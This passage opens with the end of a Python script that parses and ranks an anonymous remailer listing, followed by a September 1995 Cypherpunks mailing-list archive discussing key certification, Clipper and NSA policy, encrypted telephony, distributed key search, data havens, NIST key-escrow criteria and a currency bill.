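            # "pgp." means the short name, not the address, is the key ID.
            if "pgp." in flags:
                key_id = name
            elif "pgp" in flags:
                key_id = addr
            else:
                key_id = None
            remailers[name] = {"address": addr,
                               "flags": {f.rstrip(".") for f in flags},
                               "pgp_key_id": key_id,
                               "history": None, "latency_s": None,
                               "uptime": None}
            continue
        m = STATS_RE.match(line)
        if m and m.group(1) in remailers:
            rec = remailers[m.group(1)]
            # Both halves of the listing must name the same address.
            if m.group(2) != rec["address"]:
                raise ValueError("address mismatch for " + m.group(1))
            rec["history"] = m.group(3)
            rec["latency_s"] = _seconds(m.group(4))
            rec["uptime"] = float(m.group(5))
    return remailers


def routing_header(record):
    """Header field the remailer's class expects for the next hop."""
    for cls, header in CLASS_HEADER.items():
        if cls in record["flags"]:
            return header
    return None


def select(remailers, require=("pgp",), exclude=("mon", "filter"),
           min_uptime=99.0):
    """Names with all required flags, no excluded flag and measured uptime
    at or above min_uptime, lowest latency first."""
    picked = []
    for name, rec in remailers.items():
        if rec["uptime"] is None or rec["uptime"] < min_uptime:
            continue
        if not set(require) <= rec["flags"]:
            continue
        if set(exclude) & rec["flags"]:
            continue
        picked.append((rec["latency_s"], name))
    return [name for _, name in sorted(picked)]


if __name__ == "__main__":
    table = parse_listing(LISTING)
    for name in select(table):
        rec = table[name]
        print(name, rec["address"], routing_header(rec), rec["pgp_key_id"])
```
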




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 4 Sep 95 08:14:49 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Key attributes (was: pseudonyms & list health)
Message-ID: <v02120d08ac70d3652d61@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



If anyone still has the flyer from the Crypto '95 rump session,
there was a guy there talking about ANSI standards, and one of
the things he mentioned in his talk was work they were doing on
"key attributes."

I spoke with him afterwards, and we had a lively discussion about
this matter; especially with regard to the relationship between
key certification and key attributes. I argued that certification is
just another kind of attribute, while he is fairly hung up on
certificate hierarchies, etc. (Of course, robust and well-implemented
attributes could be used to implement a hierarchical certification
structure if that's what was desired, but there seems to be a
deep-seated feeling among crypto folks of a certain ilk that such
structure needs to be hard-coded into things.)

I'll be following up on this matter with him when I am reunited
with my notes, which made an unintended trip to SF, while I only
went to Mountain View.

>
>I could see such a system initially being piggybacked on PGP keys (the
>signatures would not be understandable by PGP though), although for
>Chaumian credential transfers the keys have to be specially structured
>and that would require a new approach.
>
>Who would be willing and/or interested enough to use such a system if it
>existed?
>
>Hal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Sep 95 05:47:45 PDT
To: cypherpunks@toad.com
Subject: MAN_iax
Message-ID: <199509041247.IAA05904@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-4-95. NYPaper:

   "Computers Beware! New Type of Virus Is Loose on the Net."

      A new and deceptively simple type of computer virus, one
      that can sneak past security devices by hitching rides
      on electronic mail and other common Internet files, is
      causing deep concern among computer security officials
      around the world. Mr. Schmidt of Sun says, "There are 
      criminals in the world and some of them are programmers.
      With computer networks, they have an amplifying effect 
      that they've never had before. If I were a criminal with 
      a gun, I might attack one person. But with a computer
      network, I can attack a million people at a time. It's
      like an atomic bomb." To avert a potential disaster, 
      Mr. Schmidt has enlisted three of the world's top 
      computer security experts, including Tsutomu Shimomura,
      Dan Farmer and Whitfield Diffie.

   "Cybervirus Whodunit: Who Creates This Stuff?"

      Ms. Gordon conducted detailed interviews, by electronic
      mail, Internet chat, telephone and in person, with more
      than 60 virus writers. "The virus writer has been 
      characterized by some as a bad, evil, depraved, maniac, 
      terrorist, technopathic, genius gone mad, sociopath." 
      This, she said, "is a gross oversimplification of the 
      situation."

   "Dick Tracy, Eat Your Heart Out."

      Move over, Captain Midnight. Heads up, Mata Hari. Now
      anyone can have a real-life decoder ring. The ring has
      a computer chip encoded with an identification number
      that gives the wearer access to secret computer files or
      locked rooms. The chip transmits your secret ID number 
      or data at the space-age speed of 16,000 bits a second.


   Triplets: MAN_iax








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 4 Sep 95 06:08:36 PDT
To: cypherpunks@toad.com
Subject: Re: Wearing RSA shirt to school
Message-ID: <9509041307.AA20870@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Let's get real.

Yes, please.

The head of Sun's network security group is a foreign national.  They're
doing DES and public key work. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Sep 95 09:11:44 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: pseudonyms & list health
Message-ID: <ac7072bf0602100490af@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:13 AM 9/4/95, Futplex wrote:
>Deranged Mutant writes:
>> My worry is about abuse.  One would prefer to save endorsements and find
>> a way to remove thumbs-downs... also how to prevent one from overdoing a
>> thumbs-up or -down certification for a person (either to inflate or de-
>> flate a reputation).
>
>A few nuisance lawsuits from people who were given thumbs-downs might do the
>trick, as with employment recommendations in the U.S. :[

A good point that deserves further comment. Employers have taken to _saying
nothing_ about past employees, for fear of lawsuits by disgruntled job
seekers. So much for free speech, courtesy of the American legal system.

But as we can't change the litigious nature of American society (and maybe
European society--I don't know), the emphasis ought to be on digital
systems and reputations by pseudonyms.

Hal's comment about transferring credentials is one approach. Sort of an
automated version of "Pr0duct Cypher says the work of Sue D'Nim is good."

At this point, not enough pseudonyms to make it very worthwhile, but someday...


>ObTim: As in other reputation markets, some people will spread their blessings
>more liberally than others. They do this at the risk of diluting the worth of
>each credential granted. It all comes out in the wash.
>
>A reviewer named Susan Granger, for example, is known to me as a person who
>routinely lauds lousy movies. Thus it's simple for me to ignore her positive
>recommendations (I've yet to see a negative review from her). In fact, when
>I observe that a new film prominently features her seal of approval in its
>advertising, I take that fact as an indication of the lack of praise from
>more discriminating reviewers. So a nominal "positive" credential may be
>interpreted as an implicit negative credential, depending upon context.

Another good point. I always think: "Ah, they couldn't get either Siskel or
Ebert to endorse it." As Futplex notes, endorsements by second- or
third-tier endorsers are often a _negative_ endorsement.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Sep 95 06:59:09 PDT
To: Alan Horowitz <alanh@infi.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <Pine.SV4.3.91.950903215715.6268B-100000@larry.infi.net>
Message-ID: <199509041358.JAA03311@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm not sure I see the words "cryptography" or any related to them
here. It might be an interesting topic, but it probably isn't
cypherpunks material.

.pm

Alan Horowitz writes:
> "Just cough up the peace dividend".
> 
> There is no peace dividend. There is a massive eco-spill of government 
> debt;  quite possibly larger than the GNP capacity of the American 
> economy to repay anytime in the next century.
> 
> The debt will be bankrupted, in some stealthy manner, hidden by masses of 
> smoke and mirrors. Nothing new here - it's  about the only thing that 
> works. For the most recent examples, read up on FDR's confiscation of 
> gold in (?) 1933.  Or read the details of the currency changeover 
> effected by the occupation authorities in Germany (1947 or 1948).
> 
> Alan Horowitz
> alanh@infi.net
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Sep 95 07:05:14 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Clinton's Black Helicopters Over My House!
In-Reply-To: <ac6fd3aa0202100430a8@[205.199.118.202]>
Message-ID: <199509041405.KAA03334@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> ObConspiracy content: high.
> 
> They are coming to take me away, take me away!
> 
> Clinton's black helicopters are swooping low over my house.
> 
> What should I do?
> 
> Yes, this has nothing to do with coding in C, or even coding in Java, but
> it's too good a story not to share with you.

Actually, it didn't seem like much of a story at all. The president's
choppers flew over your place. Big deal. Can we get back to
cryptography, please? Or do you want to hear about the time I urinated
next to Paul Newman in the bathroom at the Tanglewood Music Festival?

.pm

PS Yes, have no sense of humor. So sorry.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Sep 95 07:13:36 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <9509041307.AA20870@sulphur.osf.org>
Message-ID: <199509041413.KAA03364@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> >Let's get real.
> 
> Yes, please.
> 
> The head of Sun's network security group is a foreign national.  They're
> doing DES and public key work. :)

Of course, under the law, foreign nationals are US Persons for
purposes of the ITAR if they are permanent residents.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Sep 95 10:09:18 PDT
To: cypherpunks@toad.com
Subject: The Dangers of Caribbean Data Havens
Message-ID: <ac70802208021004b5e3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



From Bruce Sterling in "Islands in the Net" to various reports of data
havens and Internet services being set up by actual people, there has been
much speculation about using Caribbean islands for data havens.

But the infrastructure has been lacking. Low-bandwidth inter-island links.

And now yet another huge hurricane is bearing down on the Lesser Antilles,
heading directly for Puerto Rico and Hispaniola (Haiti and Dominican
Republic).

"Outages" lasting days or weeks after these islands get torn up every few
years will not go too well with international commerce.

Some fixes may help:

* higher-bandwidth connections, e.g., undersea fiber.

* satellites as primary or secondary connections

* more secure on-island facilities, designed to maintain contact with
satellites or fibers even with a Force 4 hurricane direct hit.

The "regulatory arbitrage" aspects still make using the Islands
advantageous (though they can be buffeted by political storms as well as
physical ones).

At least two current or past Cypherpunks are living in the Islands and
working on some schemes. Something to think about.

Personally, I think a distributed system based on crypto is a more robust
approach, the "Libertaria in Cyberspace" view I've talked about.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 4 Sep 95 07:26:44 PDT
To: cypherpunks@toad.com
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <ac6fd726030210040224@[205.199.118.202]>
Message-ID: <199509041426.KAA24551@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

> Grumpiness warning: I have held my tongue the past few months as all of
> these "this t-shirt has been declared a munition!!!" messages went out, but
> I can hold my tongue no longer.
[...]

> It was this series of posts about whether wearing the "munitions t-shirt"
> near schools was a crime or not that made me think the silly season had
> arrived. If the t-shirt is a munition, and books are munitions, then
> libraries must be real "ammunition dumps," ready to explode at any minute.

"Printer's ink has been running a race against gunpowder these many, many
years. Ink is handicapped, in a way, because you can blow up a man with
gunpowder in half a second, while it may take twenty years to blow him up 
with a book. But the gunpowder destroys itself along with its victim, while
a book can keep on exploding for centuries."
  - Christopher Morley, _The Haunted Bookshop_

Res ipsa loquitur.


-- 
http://yakko.cs.wmich.edu/~frogfarm     ...with that fresh new lemon scent 
           Don't mess with someone unless they mess with you first.
                                   .o.
        "Creating and distributing neurolinguistic viruses since 1969"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Mon, 4 Sep 95 09:42:04 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID: <199509041641.KAA26589@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> but for some reason, the NSA keeps humming along...? perhaps 
> confirming the rule that bureaucracies, like bores at parties,
> persist long after they are relevant?

Cryptography is a new science, it may be more effective to break in to an office
than to hack in to their computers, but maybe new discoveries will change that.

> understand marketing or human psychology. Clipper, the closest the
> agency has come to creeping out of the darkness of their coffin,
> was a total fiasco. the self-destructing director of NSA whats-his-name
> who was running for that FBI position or whatever is another example of how 
> the inbred spook society has difficulty dealing with anything outside
> their artificial reality.

I think you are dead wrong.  The NSA has mastered the market psychology.
Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
the NSA has had a hand in them all.  DES is by far the most popular cipher,
popular enough that it will take years and years to switch to something new.
As for the clipper "fiasco,"  I would argue that it was an excellent marketing
move.  The NSA is aware that there is only a very very small percentage of 
society that thinks about crypto, with the internet and what have you it is now
possible for this minority to be heard, the NSA proposes clipper, and so we all
bitch about it because it's only secure against non-government attacks.  Now
the public hears this and resists clipper.  There isn't another product that is
winning support that clipper could have had.  You step back and look at it, and
the public is exactly where they were 5 years ago, no crypto.  
Clipper was a no lose situation for them, if it is adopted only they can read
all transactions made with it, if it isn't adopted, everybody can read all 
transactions, they didn't lose anything. 
They have some top minds working for them, it's been proven that they have been
a few steps ahead of the public for a long time; it's foolish to think they 
don't understand the psychology of the market.  Just as the public starts to 
desire something like public key crypto, they can publish a standard on it
and it is likely to be adopted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 4 Sep 95 17:47:53 PDT
To: CYPHERPUNKS@toad.com
Subject: maximizing cryptographic return
Message-ID: <8B072A1.00030003E8.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


VZ> this list are aware of the idea that good encryption is often used
VZ> to send a low-bandwidth session key, which is then used to encrypt
VZ> that session using a less sophisticated but less computationally-demanding
VZ> algorithm. hence you seem to have good security at a computational
VZ> price that is less than encrypting everything with the secure protocol.

  Why must this process be limited to two levels?

VZ> I wonder if some very cheap algorithms, in terms of computation time,
VZ> could be used for the "on the fly" encryption of the voice using those
VZ> bit. would XOR with the pad be totally out of line?

  The RSA could be used by the caller to precompute the session key to
send to the receiver. The session key (IDEA or whatever) could be used
to send "subsession keys" which are actually parameters for the PRNGs
(use at least two, with different periodic characteristics, and XOR them
together) that create the pad for your XOR.

  The subsession size should be chosen so that very little "clearvoice"
is transmitted in each subsession. Perhaps a bit of randomness is in
order here, as well. Along with the PRNG parms, a length field, within
certain absolute limits. Now the spook doesn't even know where one
subsession ends, and the next begins.

  Add to this the use of a (lossy?) compression engine that can run with
little power, and a simple microcontroller (or several cheaper ones in
parallel-I can see one master for the session and subsession key
management and several slaves to handle the on-the-fly (en)(de)cryption
itself) should be able to do the job, fitting the subsession key
exchange in right along with the cyphervoice.

  Ideally, we could have a box that could pull its power from the phone
line, and take touch-tone control inputs.


 * Long, long ago, in a tagline far far away...
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 4 Sep 95 08:25:49 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: maximizing cryptographic return
Message-ID: <199509041524.LAA15061@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:49 PM 9/3/95 -0700, Vladimir Z. Nuri wrote:
>the question of the cost-effectiveness of  phone encryption was raised by 
>my other message. I would like to question how cheaply good encryption
>could be done on phones, with a poor quality microprocessor.

It doesn't take much of a microprocessor to do real-time encryption and
decryption of digitized voice, at least for DES. The problem is the
vocoder. A good vocoder needs a fast DSP chip. A custom vocoder chip
could cut this cost considerably, look at how cheap data pumps for
V.34 modems have become with mass production. If ISDN ever becomes the
mass market standard, replacing analog local loops, it would be very
inexpensive to add encryption.

Even with today's phone system, I can't see why a mass market secure
telephone couldn't be built for less than $200. The problem is
convincing enough people that they need secure telephones to get
that mass market.

The secure telephone also needs to be transparent to the users.
It should be able to set up a secure connection without requiring
the user to press any buttons or know what hardware is at the other
end. The voice quality has to be much better than some of the
"Donald Duck" quality systems that have been used in the past.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 3 Sep 95 18:33:40 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: SSL search attacks
In-Reply-To: <9508311728.AA16306@ozymandias.austin.ibm.com>
Message-ID: <199509040132.LAA21977@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Scott Brickner <sjb@austin.ibm.com>

Scott Brickner <sjb@austin.ibm.com> writes:
> Jiri Baum writes
...
> >Each client could pick a segment at random, check it and then broadcast
> >a NAK. Other clients would then know that the segment in question has
...
> This only reduces the cost if everyone is playing fair.  In practice,
...

No worse than fake NAKs to the central server (viz comment below).

> >One advantage is that it is not necessary to have a central infinitely
> >trusted server. (Nothing personal, but bogus server is an attack.)
> 
> An attack on what?  The overall model here is that someone presents
...

An attack on the attempt. If the key owner also volunteers a server,
then half the CPU cycles will report to that server (and be given
useless chunks of keyspace) thus halving the CPU power available to
the usual server ("half" in an infinitely naive world, of course).

The approach I suggested basically corresponds to everyone maintaining
hir own server; servers that trust each other will coordinate.
An attacker can of course NAK the key segment, but only those that trust
the attacker will take any notice.

> My point is that the "random" efforts are no different than everyone
> working on the problem independently, each picking a random place to
> start and going sequentially from there.

The difference is that in this scheme everyone does coordinate, only
it's peer-peer rather than client-server.

> >NAKs and IGRABs would be weighted by the trust accorded to the entity
> >that originated them.
> 
> This is similar to what I outlined yesterday afternoon.  Let unsolicited
...

I think that's where it came from. I really should provide citations,
shouldn't I...

...
> Invalid unsolicited NAKs
> don't destroy the current search, they only slow it down slightly ---
> but less than a fully random effort.

Similarly in the peer-peer approach, the effort is coordinated but
untrusted NAKs slow it down only slightly. The only "solicited" NAKs
will be your own.


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEpXLSxV6mvvBgf5AQFn2QP/eJ0BlATPHS2xoLoJuHdJYR7Y5gN5scmK
DHOby7rGJ3Rj6CZ6PrdkQVf9ckUdmUwhCzAiCi3wnPHPf0gi4rPjLyBpmyTgl8yA
q+VqYPkBAflwHqXIsqbxx94PiZayt8b578Qtqoa2jJzjSCKMa8IonWGeztP/xNxa
FCmJDocudq4=
=r/Hv
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Sep 95 12:20:27 PDT
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: More fun with cash: Senate Bill 307
In-Reply-To: <v02120d00ac70ea07f922@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.950904111848.5541B-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 4 Sep 1995, Robert Hettinga wrote:

> Has anyone heard about this bill?  Comments?

> >(c)  Currency Exchange--
> >     (1)  Plan--Not later than 12 months after the date of enactment of this
> >section, the Secretary shall develop and begin implementation of a plan to
> >require the exchange of all existing $100 denomination United States currency
> >held within and outside of the United States for $100 denomination domestic
> >use and nondomestic use United States currency issued in accordance with this
> >section.

. . .

> >     (1)  domestic use currency, issued in accordance with this section shall
> >be recognized as constituting a negotiable claim against the United States
> >Treasury only when presented within the United States, and shall constitute
> >legal tender for any debts, public or private, only when presented in the
> >United States, . . .

> >     (2)  nondomestic use currency shall be recognized as constituting a
> >negotiable claim against the United States Treasury, and legal tender
> >for any debts, public or private, only when presented outside of the 
> >United States, . . .

It's obvious that this bill has very little to do with large-scale
money laundering, narcotrafficking nor terrorism.  All those folks 
will simply use "domestic use currency" inside or outside of the 
United States.  At worst, it will cause them a one-time problem.

Then at whom is the bill really aimed?  Average, middle-class
Americans, is my guess.  Fortunately, it doesn't look too tough
to get around.  If you have a mattress full of C-notes, I suggest
you start using them to buy travelers checks--including a few
denominated in strong foreign currencies.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: microbody@wirepool.ruhr.de (Matthias Jordan)
Date: Mon, 4 Sep 95 17:45:40 PDT
To: cypherpunks@toad.com
Subject: Q: PGPfone where
Message-ID: <5tEkFnD0J2B@blank.wirepool.ruhr.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello, guys!
I just want to know where to get PGPfone outside the USA.
Ciao!

  /\/\icroBod\/     |\?/|  SoziBits <----    Attacks Drugs Weapons
 /    \______/      | I |  Falken im Netz    RAF ETA KGB LSD XTC BND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Mon, 4 Sep 95 10:58:47 PDT
To: cypherpunks@toad.com
Subject: Re: The Dangers of Caribbean Data Havens
In-Reply-To: <ac70802208021004b5e3@[205.199.118.202]>
Message-ID: <YSzSwkkAseEU084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 Sep 1995, tcmay@got.net (Timothy C. May) wrote:

> From Bruce Sterling in "Islands in the Net" to various reports of data
> havens and Internet services being set up by actual people, there has been
> much speculation about using Caribbean islands for data havens.

> But the infrastructure has been lacking. Low-bandwidth inter-island links.

> And now yet another huge hurricane is bearing down on the Lesser Antilles,
> heading directly for Puerto Rico and Hispaniola (Haiti and Dominican
> Republic).

> "Outages" lasting days or weeks after these islands get torn up every few
> years will not go too well with international commerce.

> Some fixes may help:

> * higher-bandwidth connections, e.g., undersea fiber.

I don't have the citation handy, but I recall reading that Cable &
Wireless has plans to link much of the region via undersea fiber over
the next few years.  I think it will be a simple North-South line --
Virgin Islands to Trinidad and Tobago or something like that, bypassing
the Caymans, etc.  The cost of the project is outweighed by the gains
of eliminating these recurring weather-related outages.

In fact, someone (Duncan?) may have posted the press release here over
a year ago.

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEs3CVRRFMq4NZY5AQG1bQP/SpX3Q4oVYy1BZMALu5jCWOZPi9h1DCNn
hJQ//+sRstVRhq3Alek2KHqLtO0lJdngD0RO/zrWwfy+49wFjgplyfSpwlVMFPh/
DrUxZcl3yRkfzTt+4pJtrAjuKGz6uKtbMnZ5NlCI19K9csqt2z4Di93nGwQYDG12
RccfMnhsT6Y=
=Bcpk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 4 Sep 95 09:55:34 PDT
To: cypherpunks@toad.com
Subject: RE: Key attributes (was: pseudonyms & list health)
Message-ID: <46463.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  cman@communities.com (Douglas Barnes)  writes:
> If anyone still has the flyer from the Crypto '95 rump session,
> there was a guy there talking about ANSI standards, and one of
> the things he mentioned in his talk was work they were doing on
> "key attributes."
> I spoke with him afterwards, and we had a lively discussion about
> this matter; especially with regard to the relationship between
> key certification and key attributes. I argued that certification is
> just another kind of attribute, while he is fairly hung up on
> certificate hierarchies, etc.

Did he perchance work for some US Federal Agency such as NIS&T?
Or a large corporation?

My small PGP key was created at the National Computer Security Conference
in 1992. About half the attendees were NSA, and lots more were from
assorted defense and civilian agencies. During the free time, I talked
to a bunch of them about Phil's web of trust.

I had a really hard time understanding where they were coming from,
and they had no clue as to why I thought hierarchical CA chains are
so bad.

I didn't convince anyone. But I have come to understand that if you spend
your entire working life in a job that is structured from the President
on down a hierarchy, you can't imagine any other organizational structure.

This includes the obvious LEAs such as FBI, ATF, all the Defense folks
and spooks like CIA, DIA, NSA, and the standards "setting"
folks out at NIS&T.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 4 Sep 95 09:55:39 PDT
To: pfarrell@netcom.com
Subject: Acceptable NIS&T restrictions
Message-ID: <46477.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


If we can break away from t-shirts as munitions...

I'm going to the NIS&T session this week. I'm trying to figure out
what, if any, part of the process can be made acceptable to
those in favor of bringing US policy into the 90s. I'm not sure
that this is possible.

NIS&T published (and it has been reposted to the list and sci.crypt
many times) their goals. Can we make suggestions to any that
are acceptable and realistic?

Here are some of their criteria:

    "Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm?"

CME has been suggesting DES | TRAN | DES | TRAN | DES
for years. Can they really _avoid_ (i.e. prevent) this?

    "Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?"

This is easy in hardware. Is it even possible in software?

    "Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?"

At least this has a chance of being real. We need to have a suggestion
for expiration times for the escrowed keys. This was a huge problem with the
initial Clipper.

Is there a reasonable middle ground between long term keys such
as PGP uses, and the ephemeral keys of a D-H exchange?

    "Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent?"

We all know that Tim's Flakey Key Escrow Service is most likely not
"an acceptable US escrow agent." But since CKE is a good thing, what
are the characteristics of an acceptable service to us?

I've added the discussion "topics" that NIS&T sent to participants to my
WWW pages if you want to see them all,
http://www.isse.gmu.edu/~pfarrell/nistmeeting.html
But I expect that most of the criteria that I edited out are
unacceptable to most on this list. Without further discussion.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 4 Sep 95 10:42:03 PDT
To: www-buyinfo@allegra.att.com
Subject: e$: More fun with cash: Senate Bill 307
Message-ID: <v02120d00ac70ea07f922@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone heard about this bill?  Comments?

Cheers,
Bob Hettinga

>From: glasgow@geoserv.isgs.uiuc.edu (Mary.Glasgow)
>Subject: Senate Bill 307 2-tier Money System
>Date: 31 Aug 1995 13:54:45 GMT
>Organization: University of Illinois at Urbana
>Summary: Senate Bill 307 2-Tier Money System
>Keywords: Senate Bill 307 2-Tier Money System
>
>In the Senate of the United States, January 30, 1995, Mr. Leahy introduced
>the following bill, which was read twice and referred to the Committee on
>Banking, Housing, and Urban Affairs.
>
>...for purposes of brevity, I will quote only from sections (c) Currency
>Exchange and (d) Domestic Use and Nondomestic Use Currency.
>
>(c)  Currency Exchange--
>     (1)  Plan--Not later than 12 months after the date of enactment of this
>section, the Secretary shall develop and begin implementation of a plan to
>require the exchange of all existing $100 denomination United States currency
>held within and outside of the United States for $100 denomination domestic
>use and nondomestic use United States currency issued in accordance with this
>section.
>
>     (2)  Exchange Requirements--The plan established under paragraph (1) shall
>require the currency to be exchanged--
>         (A) at financial institutions regulated under United States law and
>subject to United States currency transaction reporting and other money
>laundering deterrence requirements; or
>         (B) at financial institutions that the Secretary finds, because of
>treaty obligations, other provisions of law, or other agreements, are
>required to report significant transactions in United States currency to
>the United States Treasury, and abide by such obligations.
>     (3)  6-Month Exchange Period--
>          (A) In general--During the period beginning on the date that is 12
>months after the date of enactment of this section and ending on the date
>that is 18 months after that date of enactment, the Secretary shall permit
>the exchange of circulating $100 denomination United States currency for
>equal numbers of the domestic use and nondomestic use $100 currency issued
>in accordance with this section at institutions described in paragraph (2).
>          (B) Non-Negotiability--Except for claims pursuant to subsection (e),
>beginning on the date that is 18 months after the date of enactment of this
>section, the United States Treasury shall not recognize $100 denomination
>United States currency issued prior to the date that is 12 months after the
>date of enactment of this section as constituting a negotiable claim against
>the United States Treasury, and such currency shall not constitute legal
>tender for any debts, public or private.
>
>(d)  Domestic Use and Nondomestic Use Currency--Beginning on the date that is
>18 months after the date of enactment of this section--
